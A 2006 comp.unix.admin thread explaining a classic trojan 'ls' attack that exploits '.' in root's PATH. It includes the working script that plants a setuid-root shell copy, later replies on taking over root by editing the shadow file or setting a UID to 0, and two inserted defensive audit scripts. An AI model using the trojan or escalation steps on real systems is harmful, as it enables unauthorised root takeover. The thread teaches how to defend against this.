How is the root password stolen?


From: lovecreatesbeauty
Date: Fri, Mar 10 2006 10:08 pm
Email: "lovecreatesbeauty" <lovecreatesbea...@gmail.com>
Groups: comp.unix.admin


The book `Practical UNIX & Internet Security, 3rd' mentioned a story
about an administrator who lost his root password. I wonder why the
administrator in the story lost the root password. Following is that
story.

One person wanted to be the root to do something. He found that the
root search path included the current directory . and wrote an
executable script named `ls' under current directory, the content was:


#!/bin/sh
cp /bin/sh ./stuff/junk/.superdude
chmod 4555 ./stuff/junk/.superdude
rm -f $0
exec /bin/ls ${1+"$@"}


He then ran the following commands at the command line:


%cd
%chmod 700 .
%touch ./-f


After that he told the administrator that he could not delete a file with a
strange name in his directory. The administrator came to
him and ran the ls command but found nothing (Question 1). The
administrator switched to root by `su' and then went to that person's
directory and ran ls again. At this step, the administrator exposed the
root password (Question 2) but he was not aware of it at that time. He
continued to delete one file with strange name for that person.


The result was that administrator can not login with root after that
person changed the root password.


--- --- ---


My questions are:


Question 1: Why the administrator can not list the content of the
directory at the first time, but can do it after su to root later.


Question 2: If the administrator did an exit after ran the second ls,
will he lose the root password again?


Sincerely,


lovecreatesbeauty


From: Dave Hinz
Date: Fri, Mar 10 2006 10:47 pm
Email: Dave Hinz <DaveH...@spamcop.net>
Groups: comp.unix.admin


On 10 Mar 2006 06:08:30 -0800, lovecreatesbeauty <lovecreatesbea...@gmail.com> wrote:

(snip social engineering example)

> The result was that administrator can not login with root after that
> person changed the root password.
> Question 1: Why the administrator can not list the content of the
> directory at the first time, but can do it after su to root later.


Because . was in his path, and he wasn't running the real ls, he was
running the one in the directory he was in. NEVER have . in root's
path, especially first.


> Question 2: If the administrator did an exit after ran the second ls,
> will he lose the root password again?


A good admin will take several precautions to avoid this sort of thing.
And of course, anyone pulling such a stunt is going to lose access at
least, so it's a self-regulating problem in several ways.

From: hymie!
Date: Sat, Mar 11 2006 3:11 am
Email: hymie_@_lactose.homelinux.net (hymie!)
Groups: comp.unix.admin


In our last episode, the evil Dr. Lacto had captured our hero,
"lovecreatesbeauty" <lovecreatesbea...@gmail.com>, who said:


>The book `Practical UNIX & Internet Security, 3rd' mentioned a story
>about an administrator who lost his root password. I wonder why the
>administrator in the story lost the root password. Following is that
>story.


You are slightly misunderstanding what happened.


>One person wanted to be the root to do something. He found that the
>root search path included the current directory . and wrote an
>executable script named `ls' under current directory, the content was:

> #!/bin/sh
> cp /bin/sh ./stuff/junk/.superdude
> chmod 4555 ./stuff/junk/.superdude
> rm -f $0
> exec /bin/ls ${1+"$@"}


>The
>administrator switched to root by `su' and then went to that person's
>directory and ran ls again. At this step, the administrator exposed the
>root password (Question 2) but he was not aware of it at that time.

The root password was not exposed. The fake "ls" script created a shell
that would run with root privileges. That gave the person root access
without needing the password.

hymie! http://www.smart.net/~hymowitz h...@lactose.homelinux.net
===============================================================================
Now that you've found another key, what are you going to play?
--John Lennon/Paul McCartney
===============================================================================


From: Moe Trin
Date: Sat, Mar 11 2006 8:28 am
Email: ibupro...@painkiller.example.tld (Moe Trin)
Groups: comp.unix.admin


On 10 Mar 2006, in the Usenet newsgroup comp.unix.admin, in article
<1141999709.948499.99...@e56g2000cwe.googlegroups.com>, lovecreatesbeauty wrote:
>The book `Practical UNIX & Internet Security, 3rd' mentioned a story
>about an administrator who lost his root password. I wonder why the
>administrator in the story lost the root password.


Because he had '.' (the current directory) in the front of his PATH.


>The result was that administrator can not login with root after that
>person changed the root password.


Yes


>Question 1: Why the administrator can not list the content of the
>directory at the first time, but can do it after su to root later.


%chmod 700 .

man sh (or what ever your shell is)
man chmod (or try it yourself and see what happens)

>Question 2: If the administrator did an exit after ran the second ls,
>will he lose the root password again?


Re-read the story. "A few minutes later, he couldn't get the new root
password." The game was won when the administrator ran this ls command.
Try this:

1. Create a file named 'ls' in your home directory, that contains


echo "Hello World"


2. Make this file executable with 'chmod 700 ls'


3. Change your PATH with the command


PATH=".:$PATH"


4. List the files in your directory - using the command 'ls'


5. Log out then log back in, and repeat 4.


Think what you just did, and think why it happened.


Old guy
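
The check behind Dave Hinz's and Moe Trin's advice, as an added example that is not part of the original thread: a POSIX sh function that flags PATH entries which resolve to the current directory ('.', empty components, relative names) or to a world-writable directory. The function name audit_path and the sample PATH are assumptions made for this illustration.

```sh
#!/bin/sh
# Added example (not from the thread): audit a PATH string for entries that
# let a file in the working directory, or in a directory anyone can write to,
# shadow a system command such as ls.

# audit_path PATHSTRING
# Prints one line per risky entry as "<position>:<kind>:<entry>".
# Returns 0 when nothing is flagged, 1 otherwise.
audit_path() {
    rest="$1:"        # trailing ':' keeps an empty last component visible
    position=0
    flagged=0
    while [ -n "$rest" ]; do
        entry=${rest%%:*}
        rest=${rest#*:}
        position=$((position + 1))
        kind=
        case $entry in
            '') kind=empty ;;      # leading, trailing or doubled ':' means "current directory"
            .)  kind=dot ;;
            /*) # absolute: only a problem if any user may create files in it
                case $(ls -ldL "$entry" 2>/dev/null) in
                    d???????w*) kind=world-writable ;;
                esac ;;
            *)  kind=relative ;;   # resolved against whatever directory the user is in
        esac
        if [ -n "$kind" ]; then
            printf '%s:%s:%s\n' "$position" "$kind" "$entry"
            flagged=1
        fi
    done
    return "$flagged"
}

# Constructed sample: '.' first, as in the story, plus an empty component.
SAMPLE_PATH=".:/usr/local/bin:/usr/bin::/bin"
audit_path "${1:-$SAMPLE_PATH}" || true
```

The position in each finding matters because the shell takes the first match: an entry at position 1 shadows every system command, while one at the end only catches names that exist nowhere else in PATH.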


From: lovecreatesbeauty
Date: Sat, Mar 11 2006 12:01 pm
Email: "lovecreatesbeauty" <lovecreatesbea...@gmail.com>
Groups: comp.unix.admin

hymie! wrote:
> In our last episode, the evil Dr. Lacto had captured our hero,
> The root password was not exposed. The fake "ls" script created a shell
> that would run with root privileges. That gave the person root access
> without needing the password.


I know the root's password was not exposed, but that person changed it
later.

After su to root and ran that dummy `ls', if that administrator exited
completely, can the root's password be changed by that person?


If that administrator did not exit after su to root, then he will lose
the root's password without executing a special suid/sgid executable
script, am I right?


What real use does that dummy `ls' have?


From: Adam Price
Date: Sat, Mar 11 2006 3:06 pm
Email: Adam Price <adam+use...@pappnase.co.uk>
Groups: comp.unix.admin


On 10 Mar 2006 20:01:01 -0800, lovecreatesbeauty wrote:


> hymie! wrote:
>> In our last episode, the evil Dr. Lacto had captured our hero,
>> The root password was not exposed. The fake "ls" script created a shell
>> that would run with root privileges. That gave the person root access
>> without needing the password.

> I know the root's password was not exposed, but that person changed it
> later.


> After su to root and ran that dummy `ls', if that administrator exited
> completely, can the root's password be changed by that person?


> If that administrator did not exit after su to root, then he will lose
> the root's password without executing a special suid/sgid executable
> script, am I right?


> What real use does that dummy `ls' have?

The dummy version of ls creates a copy of the /bin/sh executable called
./stuff/junk/.superdude
When cp makes a copy of the file, the file which is created is owned by the
user who executes the copy. In this case root.

The script then changes the permissions on that executable to 4555.


This has the effect of making the script readable and executable by anyone,
and also sets the SUID bit which has the effect of running the executable
as though it were run by the user who owns it.


So an ls -l of ./stuff/junk/.superdude would show something like...


sr-xr-xr-x 1 root users 451072 Mar 10 21:23 ./stuff/junk/.superdude


Then it removes itself (rm -f $0) and executes the real ls.


It only needs to get executed once by a user with root privilege and the
game is over.
After the script has been executed by a superuser there is an executable
version of /bin/sh on the system which when executed by anyone will run
with an euid of 0.


The effect of that is that someone who runs ./stuff/junk/.superdude can then
act as root.


Does that explain it for you?
Adam
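
What Adam describes leaves a detectable artifact: a set-user-ID file whose contents equal /bin/sh. The following is an added example, not part of the original thread, that searches a directory tree for such files; the function name find_setuid_shell_copies and its output format are assumptions made for this illustration.

```sh
#!/bin/sh
# Added example (not from the thread): find set-user-ID files that are
# byte-for-byte copies of a shell, whatever they have been renamed to.

# find_setuid_shell_copies DIR REFERENCE...
# Prints "<path> uid=<owner> same-as=<reference>" for every regular file under
# DIR that has the set-user-ID bit and the same contents as a REFERENCE file.
find_setuid_shell_copies() {
    scan_dir=$1
    shift
    # -xdev stays on one filesystem; -perm -4000 selects the set-user-ID bit.
    # Paths containing newlines are not handled by this line-based loop.
    find "$scan_dir" -xdev -type f -perm -4000 -print 2>/dev/null |
    while IFS= read -r candidate; do
        for reference in "$@"; do
            [ -f "$reference" ] || continue
            if cmp -s "$candidate" "$reference"; then
                # Field 3 of 'ls -ln' is the numeric owner; 0 means the
                # file runs with an effective UID of 0.
                owner=$(ls -ln "$candidate" | awk '{print $3}')
                printf '%s uid=%s same-as=%s\n' "$candidate" "$owner" "$reference"
                break
            fi
        done
    done
}

# Stand-alone use: script DIR [REFERENCE...]; /bin/sh is the default
# reference, matching the 'cp /bin/sh' in the script quoted in the thread.
if [ "$#" -ge 1 ]; then
    scan_dir=$1
    shift
    [ "$#" -gt 0 ] || set -- /bin/sh
    find_setuid_shell_copies "$scan_dir" "$@"
fi
```

An exact-content match only catches unmodified copies; a periodic inventory of all set-user-ID files compared against a known baseline covers the rest.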


From: Adam Price
Date: Sat, Mar 11 2006 3:28 pm
Email: Adam Price <adam+use...@pappnase.co.uk>
Groups: comp.unix.admin


On 10 Mar 2006 14:47:23 GMT, Dave Hinz wrote:


> On 10 Mar 2006 06:08:30 -0800, lovecreatesbeauty <lovecreatesbea...@gmail.com> wrote:

> (snip social engineering example)


>> The result was that administrator can not login with root after that
>> person changed the root password.


>> Question 1: Why the administrator can not list the content of the
>> directory at the first time, but can do it after su to root later.

Um I don't think you are answering the right question here...
The reason he couldn't list the content as a non root user was because the
'evil' user had set his directory permissions to 700.
This was intended to force the other guy into becoming root in order to
solve the problem.
Adam

From: lovecreatesbeauty
Date: Sat, Mar 11 2006 8:22 pm
Email: "lovecreatesbeauty" <lovecreatesbea...@gmail.com>
Groups: comp.unix.admin

Adam Price wrote:
> It only needs to get executed once by a user with root privilege and the
> game is over.
> After the script has been executed by a superuser there is an executable
> version of /bin/sh on the system which when executed by anyone will run
> with an euid of 0.

> The effect of that is that someone who runs ./stuff/junk/.superdude can then
> act as root.

Great thanks for your help and detail explaining on the knowledge of
the script file.

I still have the question: Did the administrator run exit after he did
the task for that person?


1. If the administrator exited once (or twice, or set the terminal to
show `login:' prompt), can the next person act as root and change the
root's password?


2. If the administrator did not exit after su to root at all, then
anyone else can get the root privilege without that SUID script, am I
right?


From: Adam Price
Date: Sat, Mar 11 2006 10:49 pm
Email: Adam Price <adam+use...@pappnase.co.uk>
Groups: comp.unix.admin


On 11 Mar 2006 04:22:10 -0800, lovecreatesbeauty wrote:


> Adam Price wrote:
>> It only needs to get executed once by a user with root privilege and the
>> game is over.
>> After the script has been executed by a superuser there is an executable
>> version of /bin/sh on the system which when executed by anyone will run
>> with an euid of 0.

>> The effect of that is that someone who runs ./stuff/junk/.superdude can then
>> act as root.


> Great thanks for your help and detail explaining on the knowledge of
> the script file.


> I still have the question: Did the administrator run exit after he did
> the task for that person?

It doesn't matter. Once the script has run the shell file exists. We don't
know if he exited or not and we don't need to know.


> 1. If the administrator exited once (or twice, or set the terminal to
> show `login:' prompt), can the next person act as root and change the
> root's password?


Yes anyone who knows about the ...stuff/junk/.superdude can run it and get
root access.


> 2. If the administrator did not exit after su to root at all, then
> anyone else can get the root privilege without that SUID script, am I
> right?


If any user walks away without logging off then anyone who walks up to his
computer can use it as though they are that user.
If that user is logged in as root then any user can be root.

Without wishing to be rude, these are pretty fundamental things about
operating a computer and don't really have anything to do with being root
as such. You really do need to sit down and work through some of these
examples in your textbook and work out what is going on and why. It will
help you understand what is going on far more than the sort of help you
will get here.


As someone else said, read the man pages for cp, for chmod, for ls and rm,
then read about the exec system call and find out about suid.


Adam


From: Dave Hinz
Date: Sun, Mar 12 2006 12:49 am
Email: Dave Hinz <DaveH...@spamcop.net>
Groups: comp.unix.admin

On Sat, 11 Mar 2006 07:28:20 +0000, Adam Price <adam+use...@pappnase.co.uk> wrote:
> On 10 Mar 2006 14:47:23 GMT, Dave Hinz wrote:

>> (snip social engineering example)
> Um I don't think you are answering the right question here...

I realize that I didn't answer the question he's asking, because I've
never seen him before and I don't know his motivation. But I gave
enough information to give the idea that . in the path is a problem and
playing games like this is a bad idea. Others have filled in the
details.


> The reason he couldn't list the content as a non root user was because the
> 'evil' user had set his directory permissions to 700.
> This was intended to force the other guy into becoming root in order to
> solve the problem.


Yup.

From: lovecreatesbeauty
Date: Sun, Mar 12 2006 3:00 pm
Email: "lovecreatesbeauty" <lovecreatesbea...@gmail.com>
Groups: comp.unix.admin

Adam Price wrote:
> The effect of that is that someone who runs ./stuff/junk/.superdude can then
> act as root.


Thank you. I think I get it, but can not act as root by running the
dummy version of ls in my demo:

$ passwd root
passwd: You may not view or modify password information for root.
$ ls -al
total 624
drwxr-xr-x 2 joshua joshua 4096 2006-03-12 14:50 .
drwxr-xr-x 3 joshua joshua 4096 2006-03-12 14:31 ..
-r-sr-xr-x 1 root root 625228 2006-03-12 14:50 .superdude
$ ./.superdude
.superdude-2.05b$ passwd root
passwd: You may not view or modify password information for root.
.superdude-2.05b$


From: Adam Price
Date: Sun, Mar 12 2006 4:29 pm
Email: Adam Price <adam+use...@pappnase.co.uk>
Groups: comp.unix.admin


On 11 Mar 2006 23:00:31 -0800, lovecreatesbeauty wrote:


> Adam Price wrote:
>> The effect of that is that someone who runs ./stuff/junk/.superdude can then
>> act as root.

> Thank you. I think I get it, but can not act as root by running the
> dummy version of ls in my demo:


> $ passwd root
> passwd: You may not view or modify password information for root.
> $ ls -al
> total 624
> drwxr-xr-x 2 joshua joshua 4096 2006-03-12 14:50 .
> drwxr-xr-x 3 joshua joshua 4096 2006-03-12 14:31 ..
> -r-sr-xr-x 1 root root 625228 2006-03-12 14:50 .superdude
> $ ./.superdude
> .superdude-2.05b$ passwd root
> passwd: You may not view or modify password information for root.
> .superdude-2.05b$

That is probably just your passwd program being clever and realising the
difference between euid and uid (effective user id and real user id).
Try editing the password file with vipw.
Try just editing it with vi.
You should be able to make changes to the password file now, it's just that
many of the programs that are designed for editing the password file are
also likely to know about this kind of hack.
It may be that your filesystem ignores the setuid bit on the filesystem
with the home-directories (this is another common security measure).
Have a bit of a play about, see what things you can change, see how you can
use them to get higher privs.

When you have run ".superdude" try using the 'id' command and see what
user details you have.
Try using "su -" after you have run ".superdude".
Adam


From: lovecreatesbeauty
Date: Sun, Mar 12 2006 8:09 pm
Email: "lovecreatesbeauty" <lovecreatesbea...@gmail.com>
Groups: comp.unix.admin

Adam Price wrote:
> That is probably just your passwd program being clever and realising the
> difference between euid and uid (effective user id and real user id).
> Try editing the password file with vipw.
> Try just editing it with vi.
> You should be able to make changes to the password file now, it's just that
> many of the programs that are designed for editing the password file are
> also likely to know about this kind of hack.
> It may be that your filesystem ignores the setuid bit on the filesystem
> with the home-directories (this is another common security measure).
> Have a bit of a play about, see what things you can change, see how you can
> use them to get higher privs.

> When you have run ".superdude" try using the 'id' command and see what
> user details you have.
> Try using "su -" after you have run ".superdude".
> Adam

I am happy that you confirmed my understanding ( Do I really understand
it correctly :-) ) on how the root privilege leaked and the root's
password was changed in the previous messages. But I do not know how to
change the /etc/passwd file according to your suggestion to demonstrate
that trick. I am a C programmer with not much experiences and knowledge
on UNIX or even C programming language. I hope to become an excellent
C/Unix programmer/administrator like extreme experts on these groups
like you.

The /usr/bin/passwd is a separate program but not a built-in one in
/bin/sh. Though I set SUID for /bin/sh, is /usr/bin/passwd aware of
this change? I ask this question because I read the Debian Linux's
online help and it says for example `cd' is a built-in command but
passwd is not such one (I upgrade bash to and make version 3.1 my login
shell in passwd file, but the /bin/sh is a link to bash 2.05.):


$ help
GNU bash, version 3.1.0(1)-release (i686-pc-linux-gnu)
These shell commands are defined internally. Type `help' to see this
list.
<snip>
cd [-L|-P] [dir]


From: Doug Freyburger
Date: Tues, Mar 14 2006 1:17 am
Email: "Doug Freyburger" <dfrey...@yahoo.com>
Groups: comp.unix.admin

lovecreatesbeauty wrote:

> I know the root's password was not exposed, but that person changed it
> later.


> After su to root and ran that dummy `ls', if that administrator exited
> completely, can the root's password be changed by that person?

You're not describing the root password being stolen. That
wording suggests that the bad guy actually learned what the
root password was. That is not what happened. What happened
is root access without a password was given away.

You're describing root access being stolen, and thus the host
being stolen. That's different from the root password being
stolen. To steal the root password I need to find out what it
is. To steal root access I don't need to know what the root
password is. And once I have root access without a password
I can set the password to whatever I want.

> If that administrator did not exit after su to root, then he will lose
> the root's password without executing a special suid/sgid executable
> script, am I right?

> What real use does that dummy `ls' have?

The dummy ls was a script that creates a setuid shell and then
runs regular ls. This is a classic example in pretty much any
book on dealing with the root account. If this actually happened
then you need to fire the person with the dummy script. Have
Security walk them out immediately. And reload the entire host
from backup tapes that were made before the incident. Then
hire a professional to audit the system to see what prior damage
had been done.

The problem - A setuid shell runs as root for most purposes. As
such it can do nearly anything directly and can do anything
indirectly. So long as that setuid copy of the shell remains in
existence, anyone who can get to that copy has unlimited power
on that host.


In another post you noticed that running a setuid shell isn't
quite the same thing as really being root. There are specific
technical differences between having an effective UID of 0 from
running a setuid-root executable and having an actual UID of
0 from logging in as root. But that doesn't matter. Simple
programs like "cp", "chmod" and "mv" are all you need anyways.


So you can't change the root password with a setuid shell.
You can use "vi" to set passwords. That's how the bad guy
would do it anyways.


From: lovecreatesbeauty
Date: Tues, Mar 14 2006 11:41 am
Email: "lovecreatesbeauty" <lovecreatesbea...@gmail.com>
Groups: comp.unix.admin

Doug Freyburger wrote:
> So you can't change the root password with a setuid shell.
> You can use "vi" to set passwords. That's how the bad guy
> would do it anyways.


Thank you. Adam suggested this vipw command and I see some other people
mentioned vipw is more secure also. I tried to change one newly added
user's passwd by vipw in my demo, but failed at login. I tried
following the two commands and deleted the password field between two
colons. The colons remained certainly. I think it meant that the user's
passwd was cleared or set to be blank. But I can not login this user
with a blank password.

$ su root -c 'vipw'
$ su root -c 'vipw -s'


user::1001:100::/home/user:


I know the password field in /etc/passwd is a placeholder and not a
real password to the corresponding user. But when I use 'vipw -s', I
see a strange string in the password field, is it the encrypted
password? If I change that password field, it will be decrypted to the
real password when login, we still can not know this real password. How
can I change password in this way? It's confused.


From: Adam Price
Date: Tues, Mar 14 2006 1:46 pm
Email: Adam Price <adam+use...@pappnase.co.uk>
Groups: comp.unix.admin


On 13 Mar 2006 19:41:58 -0800, lovecreatesbeauty wrote:


> Doug Freyburger wrote:
>> So you can't change the root password with a setuid shell.
>> You can use "vi" to set passwords. That's how the bad guy
>> would do it anyways.

> Thank you. Adam suggested this vipw command and I see some other people
> mentioned vipw is more secure also. I tried to change one newly added
> user's passwd by vipw in my demo, but failed at login. I tried
> following the two commands and deleted the password field between two
> colons. The colons remained certainly. I think it meant that the user's
> passwd was cleared or set to be blank. But I can not login this user
> with a blank password.


> $ su root -c 'vipw'
> $ su root -c 'vipw -s'


> user::1001:100::/home/user:


> I know the password field in /etc/passwd is a placeholder and not a
> real password to the corresponding user. But when I use 'vipw -s', I
> see a strange string in the password field, is it the encrypted
> password? If I change that password field, it will be decrypted to the
> real password when login, we still can not know this real password. How
> can I change password in this way? It's confused.

Your system is obviously more secure than a basic unix system. Edit the
shadow password file, find your username, Copy the encrypted password,
Place it in the root entry. (Read the man page for passwd to find out which
fields are which). Now log in as root using YOUR password not the root
password.
Keep a copy of the shadow password file before you do this.

Or when you edit the password file, change your user id to 0. Then when you
log in as you change the root password with the passwd command.
Or Or Or...
Loads of ways to do this, but the point of the lesson in the book was to
remind you that if you leave . in root's PATH variable that you will run the
risk of losing control of the box, not to teach you how to hack your home
linux system.
This really isn't the place for hacking lessons (and I don't know where such
a place might be).
If you understand why this is a bad idea now then you can move on to the
next chapter in the book.
Adam


From: lovecreatesbeauty
Date: Tues, Mar 14 2006 9:46 pm
Email: "lovecreatesbeauty" <lovecreatesbea...@gmail.com>
Groups: comp.unix.admin

Adam Price wrote:

> Your system is obviously more secure than a basic unix system. Edit the
> shadow password file, find your username, Copy the encrypted password,
> Place it in the root entry. (Read the man page for passwd to find out which
> fields are which). Now log in as root using YOUR password not the root
> password.
> Keep a copy of the shadow password file before you do this.

Hello Adam. Thank you. I changed one non-root user's password by vipw
successfully under your help. I did this on Debian Linux 3.1, and it is
more secure as you mentioned. I will never have . in my PATH variable
at the first position, I will keep it in mind. I'll continue to go
through the rest of that book and read many other books. I have learnt
a lot from you. Thank you for the kindly help.

From: Doug Freyburger
Date: Tues, Mar 14 2006 11:41 pm
Email: "Doug Freyburger" <dfrey...@yahoo.com>
Groups: comp.unix.admin

lovecreatesbeauty wrote:
> Doug Freyburger wrote:

> > So you can't change the root password with a setuid shell.
> > You can use "vi" to set passwords. That's how the bad guy
> > would do it anyways.


> Thank you. Adam suggested this vipw command and I see some other people
> mentioned vipw is more secure also.

vipw is more secure, does error checking, tries to lock out other
vipw users and so on. Among other things it's one of the programs
that tries to tell the difference between running setuid and being
logged in as root. It's one of the reasons the bad guys would
use vi instead.


> I tried to change one newly added
> user's passwd by vipw in my demo, but failed at login. I tried
> following the two commands and deleted the password field between two
> colons. The colons remained certainly. I think it meant that the user's
> passwd was cleared or set to be blank. But I can not login this user
> with a blank password.


Shadow file already discussed in another post.
